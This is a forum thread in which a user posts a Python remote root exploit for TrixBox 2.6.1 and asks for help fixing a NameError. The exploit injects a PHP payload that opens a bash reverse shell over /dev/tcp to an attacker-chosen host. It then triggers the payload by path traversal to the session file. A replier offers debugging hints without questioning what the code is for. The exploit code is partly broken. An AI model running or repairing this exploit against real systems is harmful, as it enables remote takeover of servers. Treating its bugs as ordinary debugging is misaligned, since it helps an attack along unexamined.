Member Avatar for deb0and

Not sure what this error means "NameError: global name 'sessionid' is not defined"

Any help would be greatly appreciated.


Below is the code

import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.13.211 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
   		 global sessionid
           	 find_sessionid=cook[1][10:42]       
	    cook=header.split(" ")
            print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"

Below is the specific line spewing out the error

tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
  • 2 Contributors
  • 5 Replies
  • 861 Views
  • 7 Hours Discussion Span
  • Latest Post Latest Post by deb0and

Recommended Answers

All 5 Replies

Member Avatar for TrustyTony

Line 40 has no purpose. You are replacing the function find_session_id with slice at line 41, what is purpose of that?

You have read http://docs.python.org/library/email-examples.html, haven't you?

Edited by TrustyTony because: n/a
Member Avatar for deb0and

Line 40 has no purpose. You are replacing the function find_session_id with slice at line 41, what is purpose of that?

You have read http://docs.python.org/library/email-examples.html, haven't you?

Thanks for the reply but still get same error when I remove line 40, any more suggestions?

Member Avatar for TrustyTony

And you fixed line 41?

Member Avatar for deb0and

And you fixed line 41?

No I have not, I'm not sure how to. Python isn't my language so it's very new to me and slightly strange.

Member Avatar for deb0and

And you fixed line 41?

No i get a different error


File "./trix.py", line 55, in find_sessionid
print "[*] Session ID is %s" % sessionid
NameError: global name 'sessionid' is not defined

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.